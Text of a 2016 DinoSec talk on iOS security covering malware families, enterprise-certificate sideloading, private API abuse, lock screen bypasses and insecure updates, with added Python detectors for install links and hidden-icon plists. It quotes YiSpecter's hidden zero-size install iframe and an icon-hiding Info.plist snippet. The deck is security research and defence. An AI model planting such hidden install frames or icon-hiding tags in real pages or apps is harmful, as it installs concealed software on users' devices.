iOS: including Ordinary Security? - DinoSec


2016 © Dino Security S.L. All rights reserved.

iOS: including Ordinary Security?

www.navajanegra.com (#nn6ed)

Raúl Siles, Founder & Senior Security Analyst
[email protected]
October 1, 2016

www.dinosec.com
@dinosec


"iOS is considered to be by many in the industry one of the most secure mobile platforms"


Outline

• iOS State-of-the-Art
• Malware
• Developers
• Lock Screen
• Digital Certificates
• Software Updates
• Wi-Fi
• Conclusions


iOS State-of-the-Art


Market Share: Mobile Devices

Q2 2015:
• Android: 82.8%
• iOS: 13.9%
• WP: 2.6%
• BB: 0.3%
• Others: 0.4%

Consolidated trend: more than 300 million units shipped per quarter (Qx); 1.3 billion units in 2014.

Reference: http://www.idc.com/prodserv/smartphone-os-market-share.jsp


• iOS after 10 years…
  – 2007: iPhone 2G (iOS 1)
  – 2008: iPhone 3G (iOS 2)
  – 2009: iPhone 3GS (iOS 3)
  – 2010: iPhone 4 (iOS 4) + iPad 1
  – 2011: iPhone 4S (iOS 5) + iPad 2
  – 2012: iPhone 5 (iOS 6) + iPad 3 & 4 & mini
  – 2013: iPhone 5c & 5s (iOS 7) + iPad air & mini 2
  – 2014: iPhone 6 & 6+ (iOS 8) + iPad air 2 & mini 3
  – 2015: iPhone 6S & 6S+ (iOS 9) + iPad Pro 12.9" & mini 4
    • Apple Watch & Apple Pencil
  – 2016: iPhone SE + iPad Pro 9.7" + iPhone 7 & 7+ (iOS 10)

Security By (CVE) Numbers

Official numbers:
• iOS 9: 101
• iOS 9.0.1: -
• iOS 9.0.2: 1
• iOS 9.1: 49
• iOS 9.2: 50
• iOS 9.2.1: 13
• iOS 9.3: 39
• iOS 9.3.1: -
• iOS 9.3.2: 39
• iOS 9.3.3: 46
• iOS 9.3.4: 1
• iOS 9.3.5: 3

iOS 9.x: 342

Official numbers:
• iOS 8: 56
• iOS 8.1: 5
• iOS 8.1.1: 9
• iOS 8.1.2: -
• iOS 8.1.3: 34
• iOS 8.2: 6
• iOS 8.3: 58
• iOS 8.4: 33
• iOS 8.4.1: 71

iOS 8.x: 272

Official numbers:
• iOS 6: 197
• iOS 7: 80
• iOS 7.1: 41
• …

Official numbers:
• wOS 1.0.1: 13
• wOS 2.0: 39
• wOS 2.0.1: 14
• wOS 2.1: 30
• wOS 2.2: 34
• wOS 2.2.1: 26
• wOS 2.2.2: 26

wOS x.y: 182

Official numbers?
• iOS 10: 7
• iOS 10.0.1: 1
• iOS 10.0.2: 0

• wOS 3: 1

Official numbers
• iOS 10: 49
• iOS 10.0.1: 1
• iOS 10.0.2: 0

• wOS 3: 19


Malware?


"If it has no name, it does not exist!"

How do we identify or classify malware families and specimens if there are no anti-virus (or anti-malware) solutions for iOS?
– Malware (CME)
– Vulnerabilities (CVE)


Recent iOS Malware Trends (1/2)

• "No iOS Zone" (DoS) – Malicious SSL certificates (iOS < 8.3) (Apr'15)
  – https://www.skycure.com/blog/ios-shield-allows-dos-attacks-on-ios-devices/
  – WiFiGate: https://www.skycure.com/blog/wifigate-how-mobile-carriers-expose-us-to-wi-fi-attacks/
• XARA: Unauthorized Cross-App Resource Access on MAC OS X and iOS (Jun'15)
  – https://drive.google.com/file/d/0BxxXk1d3yyuZOFlsdkNMSGswSGs/view?pli=1
  – http://www.imore.com/depth-look-ios-os-x-xara-vulnerabilities
• KeyRaider: iOS Malware Steals Over 225,000 Apple Accounts (Aug'15) (for jailbroken devices)
  – http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/
• Masque attack(s)…
  – "Masque Attack: All Your iOS Apps Belong to Us" (Nov'14)
    • https://www.fireeye.com/blog/threat-research/2014/11/masque-attack-all-your-ios-apps-belong-to-us.html
  – Wirelurker (Nov'14): http://researchcenter.paloaltonetworks.com/2014/11/wirelurker-new-era-os-x-ios-malware/
  – "iOS Masque Attack Revived: Bypassing Prompt for Trust and App URL Scheme Hijacking" (Feb'15)
    • https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html
  – "Three New Masque Attacks against iOS: Demolishing, Breaking and Hijacking" (Jun'15)
    • https://www.fireeye.com/blog/threat-research/2015/06/three_new_masqueatt.html


Recent iOS Malware Trends (2/2)

• …More masque attack(s)
  – "iOS Masque Attack Weaponized: A Real World Look" (Aug'15)
    • https://www.fireeye.com/blog/threat-research/2015/08/ios_masque_attackwe.html
• XcodeGhost (Sep'15 & Nov'15)
  – http://researchcenter.paloaltonetworks.com/2015/09/novel-malware-xcodeghost-modifies-xcode-infects-apple-ios-apps-and-hits-app-store/
  – https://blog.lookout.com/blog/2015/09/20/xcodeghost/
  – https://blog.lookout.com/blog/2015/09/21/xcodeghost-apps
  – https://blog.lookout.com/blog/2015/09/22/xcodeghost-detection/
  – https://www.fireeye.com/blog/threat-research/2015/11/xcodeghost_s_a_new.html
• ZergHelper: Pirated iOS App Store's Client (…) Evaded Apple iOS Code Review (Feb'16)
  – http://researchcenter.paloaltonetworks.com/2016/02/pirated-ios-app-stores-client-successfully-evaded-apple-ios-code-review/
• AceDeceiver: iOS Trojan Exploiting Apple DRM Design Flaws (…) (Mar'16)
  – http://researchcenter.paloaltonetworks.com/2016/03/acedeceiver-first-ios-trojan-exploiting-apple-drm-design-flaws-to-infect-any-ios-device/
• Pegasus (Aug'16)
  – https://citizenlab.org/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/


iOS Malware

• Distributing Apps Out of the App Store
• Abusing Apple Private APIs


Distributing Apps Out of the App Store

• Apple Developer Enterprise Program (vs. Apple Developer Program)
  – https://developer.apple.com/programs/enterprise/ ($299/year)
• Provision iOS apps for internal corporate distribution (in-house)
  – Enterprise certs and profiles can "only" be used for internal distribution
  – Technically, they can be used to install any app on any device
    • Violating Apple's Developer Enterprise Program terms of service
      – Avoids Apple's App Store vetting process
    • And it allows the usage of Apple private APIs (sensitive operations)
• User must accept the app installation (two taps)
  – In iOS 9 it is required to manually trust the developer (provisioning profile)

http://johannesluderschmidt.de/provision-ios-ipa-app-for-in-house-enterprise-distribution/


"Two taps to rule them all"


Apple Developer Enterprise Distribution Requirements

• Become an Apple enterprise "developer": $299/year
• Generate a certificate to distribute iOS apps
• Create a provisioning profile
• Create the iOS app IPA file & associated Manifest file (PLIST)
• Create an "itms-services" web link pointing to the Manifest
  – The Manifest file includes the reference to the IPA file (app)
• Own a web server with a valid trusted certificate (HTTPS)
• Distribute the web link: E.g. Tweet, web page, e-mail, Google dork, etc.
  – Real benign distribution cases in Spain and China

<a href="itms-services://?action=download-manifest&url=https://www.dinosec.com/dist/app/manifest.plist">Install this app!</a>


Distributing Apps Out of the App Store: iOS 8 & 9+


Abusing Apple Private APIs (1/2)

• Objective-C
  – Message dispatch mechanism to invoke method/function calls
  – objc_msgSend (String parameters)
    • Class name and method name
    • Not resolved statically, but at runtime (or execution time)
  – Obfuscated and/or encrypted
  – Load a library (dlopen) and access a function (dlsym)
    • Runtime (or NSClassFromString / NSSelectorFromString)
• Apple's App Store review or vetting process
  – Private APIs accessing sensitive user information


Abusing Apple Private APIs (2/2)

• "iRiS: Vetting Private API Abuse in iOS Applications" (Oct 2015)
  – Dynamic analysis of API calls that cannot be resolved statically ("suspicious")
  – 2,019 apps analyzed: 146 (7%) make use of 150 private APIs (25 critical)
• SourceDNA (Oct 2015)
  – Using the methods described in the previous slide…
  – 256 apps affected (+1 million downloads)
  – Youmi's Ad SDK (obfuscated binary ad library)
    • It sends user info to a server in China
      – List of installed apps, currently running app, serial number, hardware components (peripherals), "e-mail" Apple ID…

http://www.cse.buffalo.edu/~mohaisen/classes/fall2015/cse709/docs/deng-ccs15.pdf
https://sourcedna.com/blog/20151018/ios-apps-using-private-apis.html


YiSpecter (Oct 5, 2015)

• Distributed through an Apple Enterprise Developer certificate
  – Evades Apple's App Store vetting process
  – Targets both jailbroken and non-jailbroken iOS devices
• Extensive usage of private APIs
  – MobileInstallation: local app (.ipa file) install & uninstall capabilities
  – Claims a private entitlement key used by iOS system apps
    • com.apple.private.mobileinstall.allowedSPI
  – Monitors the currently open app and displays advertisements
    • SpringBoardServices: SBSCopyFrontmostApplicationDisplayIdentifier
    • SpringBoardServices: SBSLaunchApplicationWithIdentifier
  – Obtains the list of installed apps: MobileInstallationLookup
  – Mobile Safari manipulation: default search engine, bookmarks, etc.

http://researchcenter.paloaltonetworks.com/2015/10/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/

<iframe src="itms-services://?action=download-manifest&url=https://qvod.bb800.com/assets/upload/3794.plist" height=0 width=0></iframe>
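Both the enterprise-distribution link on the earlier slide and the zero-sized YiSpecter iframe above are "itms-services" install triggers in ordinary HTML, which is what a web proxy or mail gateway can look for. The scanner below is an added example, not code from the talk or from DinoSec; the sample page and its domains are constructed placeholders.

```python
"""Added example (not from the talk or from DinoSec): flag itms-services
enterprise-distribution links in an HTML page, as a web proxy or mail
gateway filter might. SAMPLE_HTML is constructed; its domains are placeholders."""
import re
from urllib.parse import parse_qs, urlsplit

# href="..." / src='...' / src=... attribute values, in document order
ATTR_RE = re.compile(r'\b(href|src)\s*=\s*["\']?([^"\'\s>]+)', re.IGNORECASE)
# whole <iframe ...> opening tags, so a link can be tied to its frame
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# height=0 / width="0": the zero-sized frame used for drive-by install prompts
ZERO_SIZE_RE = re.compile(r'\b(height|width)\s*=\s*["\']?0\b', re.IGNORECASE)

SAMPLE_HTML = """
<html><body>
<p>Corporate app portal (constructed sample page)</p>
<a href="itms-services://?action=download-manifest&url=https://apps.example.com/dist/app/manifest.plist">Install this app!</a>
<a href="https://apps.example.com/help.html">Help</a>
<iframe src="itms-services://?action=download-manifest&url=http://cdn.example.net/assets/upload/3794.plist" height=0 width=0></iframe>
</body></html>
"""


def manifest_url(link):
    """Return the manifest URL carried by an itms-services:// link, else None."""
    parts = urlsplit(link)
    if parts.scheme.lower() != "itms-services":
        return None
    query = parse_qs(parts.query)
    if query.get("action", [""])[0] != "download-manifest":
        return None
    urls = query.get("url")
    return urls[0] if urls else None


def scan_html(html):
    """Return one finding per itms-services link: the attribute it sits in,
    whether the manifest is fetched over plain HTTP (the slide requires a
    trusted HTTPS server), and whether it hides in a 0x0 iframe."""
    hidden_frames = [t.group(0) for t in IFRAME_RE.finditer(html)
                     if ZERO_SIZE_RE.search(t.group(0))]
    findings = []
    for m in ATTR_RE.finditer(html):
        attr, link = m.group(1).lower(), m.group(2)
        manifest = manifest_url(link)
        if manifest is None:
            continue  # ordinary link, not an enterprise install trigger
        findings.append({
            "attribute": attr,
            "manifest": manifest,
            "plain_http": urlsplit(manifest).scheme.lower() != "https",
            "hidden_iframe": any(link in tag for tag in hidden_frames),
        })
    return findings


if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML):
        print(finding)
```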


Abusing Apple iOS System Features

• Suppress the presence of the app icon from SpringBoard
  – Makes it harder to remove the app / malware (e.g. YiSpecter)
    • Alternative: Reset the iOS device to factory defaults
• Info.plist file
  – Declares the properties & app
  – Undocumented feature
    • Suppress SpringBoard from displaying the installed app icon
    • Intended for Apple's system apps without UI components
  – Deprecated as of iOS 8.3
    • iOS 8: com.apple.*

<dict>
...
<key>CFBundleDisplayName</key><string>Passbook</string>
<key>CFBundleExecutable</key><string>NoIcon</string>
<key>CFBundleIdentifier</key><string>com.weiying.hiddenIconLaunch</string>
<key>CFBundleShortVersionString</key><string>2.3.0</string>
...
<key>SBAppTags</key>
<array>
<string>hidden</string>
</array>

http://www.zdziarski.com/blog/?p=5072
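A quick way to audit an app bundle for the icon-hiding tag shown above, as an added example (not from the talk or from DinoSec): parse the Info.plist and flag the SBAppTags "hidden" entry, treating it as especially suspicious on a non-com.apple.* bundle since iOS 8 only honoured it for Apple's own apps. The plist below is constructed for the example, modelled on the keys from the slide.

```python
"""Added example (not from the talk or from DinoSec): audit an iOS app's
Info.plist for the undocumented SBAppTags "hidden" icon-suppression tag.
SAMPLE_INFO_PLIST is constructed, modelled on the keys shown on the slide."""
import plistlib

SAMPLE_INFO_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>CFBundleDisplayName</key><string>Passbook</string>
  <key>CFBundleExecutable</key><string>NoIcon</string>
  <key>CFBundleIdentifier</key><string>com.example.hiddenIconLaunch</string>
  <key>CFBundleShortVersionString</key><string>2.3.0</string>
  <key>SBAppTags</key><array><string>hidden</string></array>
</dict>
</plist>
"""


def audit_info_plist(data):
    """Parse an Info.plist (XML or binary bytes) and report icon-hiding indicators."""
    info = plistlib.loads(data)
    tags = info.get("SBAppTags", [])
    if isinstance(tags, str):  # tolerate a single string instead of an array
        tags = [tags]
    bundle_id = info.get("CFBundleIdentifier", "")
    hidden = "hidden" in tags
    # iOS 8 honoured the tag only for Apple's own (com.apple.*) bundles; a
    # third-party bundle carrying it is the YiSpecter-style case from the slide
    return {
        "bundle_id": bundle_id,
        "display_name": info.get("CFBundleDisplayName", ""),
        "hidden_tag": hidden,
        "third_party_hidden": hidden and not bundle_id.startswith("com.apple."),
    }


if __name__ == "__main__":
    print(audit_info_plist(SAMPLE_INFO_PLIST))
```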


Another way of Temporarily Hiding iOS Apps

• iOS 7, 8 & 9 (9.3.2)
  – Non-jailbroken iOS devices
• The first SpringBoard pane (home screen) and the dock must be completely full of apps
  – App to hide must go into another app, to create a folder, and into the dock at the end
• Hidden apps are still accessible from Spotlight search
  – Hidden apps are still visible from Settings – General – Storage & iCloud Usage – [Storage] Manage Storage – (List of installed apps)
• Hidden apps are restored after the iOS device reboots

https://www.youtube.com/watch?v=NlA-B_98K78


Temporarily Hiding iOS Apps


Developers


"Is this a bug or a feature?"


What Is This?

• San Francisco, June 13-17, 2016
• 2,000,000
  – Apps in the App Store (from 500 to 2M in 8 years)
  – Downloaded 130,000,000,000 times
• 13,000,000
  – Registered developers
  – 2 million registered in the last year alone
• Anything strange here?


Developing for the Apple Mobile Ecosystem

• Apple developer membership options
  – Individual: Free or Apple Developer Program ($99/year)
  – Organization: Apple Developer (Enterprise) Program ($99 or $299/year)
• Prior to Xcode 7 (Sep 2015)
  – Rigorous control over the iOS developer community (regulated market)
• After Xcode 7: iOS app sideloading
  – A free Apple ID is all you need to start running any code on iOS devices
    • No Apple ID extensive checks: anonymity via fake Apple IDs (e-mails)
    • A malware developer just needs physical access to an iOS device (USB connection)
    • Install, or even replace legitimate, iOS apps with malicious ones…

https://www.mi3security.com/why-2016-may-be-the-year-of-ios-malware/


iOS App Sideloading


Advanced App Capabilities

https://developer.apple.com/support/app-capabilities/


Su-A-Cyder (1/2)

• Toolset or framework to generate trojanized iOS apps / malware
  – Take a decrypted iOS app, inject it with evil code, resign the app with any Apple ID, and install the repackaged app on any non-jailbroken iOS device
  – Home-Brewed iOS Malware PoC Generator (BlackHat ASIA 2016)
    • http://blackhat.com/asia-16/briefings.html#su-a-cyder-homebrewing-malware-for-ios-like-a-b0$$
  – Threat or attack vector (not a vulnerability, and not malware)
• User must accept app installation prompt
  – Unlocked iOS device
• Full access to most data within the trojanized app
  – Corporate credentials, VPN access, healthcare records, etc.
  – Location info (GPS or EXIF), address book, calendar, Health Kit, etc.

https://www.mi3security.com/su-a-cyder-ios-malware/


Su-A-Cyder (2/2)

• Based on open-source tools
  – Cydia, Theos(-jailed), libimobiledevice, insert_dylib & Spaceship/Fastlane
  – By Mi3 Security (Chilik Tamir)
• Evil .dylib (no need for original source code) - E.g. Cycript
• Provisioning profile (Apple ID)
• Untrusted developer
  – Verify the developer app certificate is trusted on target iOS device
  – Settings – General – Device Management: Developer App (by Apple ID)
  – Trust "Apple ID" (developer)
  – Verify App via network connection for a specific iOS device (& Delete Apps)

https://github.com/Mi3Security/su-a-cyder


Su-A-Cyder: Skype

Based on: https://www.youtube.com/watch?v=oscx8AC0qUI


SandJacking

• Su-a-cyder app upgrades fixed by Apple in iOS 8.3
  – Install process denies app upgrades with mismatched app ID (bundle ID)
• Alternative attack vector for iOS 8.3+
  – Backup device
  – Delete legitimate app
  – Install evil app
  – Restore backup over the evil app
• HITB (May 2016) by Mi3 Security (Chilik Tamir)
  – PoC tool, SandJacker, not released until it is fixed by Apple

https://conference.hitb.org/hitbsecconf2016ams/materials/D1T2%20-%20Chilik%20Tamir%20-%20Profiting%20from%20iOS%20Malware.pdf


Pangu 9 Jailbreak

• Pangu 9.2-9.3.3 on demand jailbreak
  – 64-bit devices only
• Vulnerability fixed in 9.3.4
• Tap-to-jailbreak app
  – First semi-untethered jailbreak (reboot device)
  – 7-day certificate vs. 1-year certificate
    • Beijing Hong Yuan Online Technology (revoked – April 2017)
    • Trust developer (requires an Internet connection)
  – Cydia Impactor: http://www.cydiaimpactor.com (Saurik)

http://en.pangu.io/help.html


iOS Malicious Apps Distribution Vectors

• Jailbroken iOS device
  – iOS version? Vulnerable to jailbreak? Local or remote? 0-day?
• Non-jailbroken iOS device
  – App Store
    • All code must be signed by an identified developer + Apple's review or vetting process
    • Malware in the official App Store
      – Coin your own definition of mobile malware: WhatsApp, Linked-In…
      – LBTM, InstaStock, FindAndCall, Jekyll, FakeTor, XcodeGhost, InstaAgent, abusing private APIs (e.g. Youmi's Ad SDK), ZergHelper, AceDeceiver (Apple's DRM flaws: FairPlay)
  – Out of the App Store
    • Abuse private APIs (out of Apple's App Store review process)
    • Remote: Abusing Apple Enterprise Developer Certificates
      – Third-party app stores: vShare, 25PP, Kuaiyong, 7659, etc.
      – Malicious apps: FinFisher, Pangu, Masque Attack, WireLurker, Hacking Team, Oneclickfraud, YiSpecter…
    • Local: Sideloading iOS apps in Xcode 7+
      – Su-a-Cyder, SandJacker and Pangu 9.2-9.3.3 jailbreak
    • MDM: SideStepper


Digging in the Old Trunk

iOS 9.3.2

iOS 10


Lock Screen


"Voice Hacking"


Bypassing iOS Lock Screen History

• Between 2011-2016…
  – iOS 5.x: 4 vulnerabilities
  – iOS 6.x: 8 vulnerabilities
  – iOS 7.x: 12 vulnerabilities
  – iOS 8.x: 11 vulnerabilities
  – iOS 9.x: 6 vulnerabilities (up to now, iOS 9.3.2…)
• Smartcover, SIM card, Control Center, Notifications Center, Siri…
• Temporary unauthorized physical access to device
  – Just a few seconds (or minutes)

http://blog.dinosec.com/2014/09/bypassing-ios-lock-screens.html
(Updated with every single iOS version since Sep 2014)


Bypassing iOS Lock Screen Via Siri

New iOS version released just to fix one of these bugs:

iOS 9.0.2 (CVE-2015-5923)


Digital Certificates


"If there is no CVE, there is no vulnerability"

"Today, I'm proud to say that at the end of 2016, App Transport Security (ATS) is becoming a requirement for App Store apps"
– Ivan Krstic, Apple's head of security engineering and architecture, WWDC 2016


What Is This?

"Continue" or "Details – Trust"

The double button of mass destruction!!


(Un)Manageable Digital Certificates

• Mobile Safari
  • iOS will never ask the user about that certificate again…
    – Never ever! (iOS 9.3.2)
  • Settings – Safari: "Clear History and Website Data" does not help
  • Even after rebooting the iOS device…
    – Fake: Since iOS 7
  • In previous iOS versions (e.g. 5.1.1): Settings – Safari and selecting "Clear Cookies and Data" (and/or rebooting) does not help!

< 2012 ?


Digesting Digital Certificates


Managing Digital Certificates?

• Alternatively, before connecting to any website via Mobile Safari, install self-signed certs as configuration profiles
  – Settings – General – Profiles
• Delete the "offending" cert by…
  – … "Never use a cannon to kill a fly" (Confucius)
  – Removing all settings (or, at least, all network settings)…
    • Settings – General – Reset – Reset All Settings
    • Settings – General – Reset – Reset Network Settings
• Configuration profile (MDM)
  – Security & Privacy: "Accept untrusted TLS certificates"


Software Updates


"Once a vulnerability gets a CVE assigned, and the vendor says it has been fixed… you don't need to worry anymore, right?"


iOS & WatchOS Software Updates

• "iOS - Back to the Future" (March 2014) & "II" (December 2014)
  – Raúl Siles (DinoSec): http://www.dinosec.com/en/lab.html#Rooted2014iOS
• iOS: Settings – General – Software Update
  – http://mesu.apple.com/assets/com_apple_MobileAsset_SoftwareUpdate/com_apple_MobileAsset_SoftwareUpdate.xml
  – http://mesu.apple.com/assets/com_apple_MobileAsset_SoftwareUpdateDocumentation/com_apple_MobileAsset_SoftwareUpdateDocumentation.xml
• watchOS: Watch app – General – Software Update
  – http://mesu.apple.com/assets/watch/com_apple_MobileAsset_SoftwareUpdate/com_apple_MobileAsset_SoftwareUpdate.xml
  – http://mesu.apple.com/assets/com_apple_MobileAsset_WatchSoftwareUpdateDocumentation/com_apple_MobileAsset_WatchSoftwareUpdateDocumentation.xml


iOS & watchOS Update Freeze

Video recorded on June 20, 2016. Latest versions available:
iOS 9.3.2
watchOS 2.1.1


iOS Software Updates (Finally) Using HTTPS

• iOS 10
  – CVE-2016-4741: https://support.apple.com/es-es/HT207143
• Vulnerability lifecycle
  – Discovered in February 2012
  – Notified to Apple in February 2014
  – Disclosed publicly in March 2014
  – Partially fixed by Apple in September 2014
    • iOS 8 (CVE-2014-4383)
  – Re-notified to Apple in November 2014 & May 2016
• To all security researchers…
  – You can do it! Yes, we can! :-)


Wi-Fi


"What vulnerabilities get a CVE assigned to them?"

"The ones that are really critical!"


Really Critical CVE :-)

• "Wi-Fi: Why iOS (Android & others) Fail inexplicably" (March 2013)
  – Raúl Siles (DinoSec): http://www.dinosec.com/en/lab.html#Rooted2013WiFi
• iOS 8.3 (April 8, 2015)
  – Probably you can get a CVE assigned to you too if you paid attention…

https://support.apple.com/en-us/HT204661

radius.dinosec.com


A Not So Critical (Inexistent) CVE :-(

• "Wi-Fi: Why iOS (Android & others) Fail inexplicably" (March 2013)
  – Raúl Siles (DinoSec): http://www.dinosec.com/en/lab.html#Rooted2013WiFi
• Wi-Fi WPA(2)/Enterprise attacks (No CVE assigned: it's a feature, not a bug…)

Can you find the differences?


Wi-Fi Enterprise Networks: Set-Up


Wi-Fi Enterprise Networks


Conclusions


Spanish Collection of Proverbs

"An apple a day keeps the intruder away"


Questions?

www.dinosec.com
@dinosec

Raúl Siles
raul@dinosec.com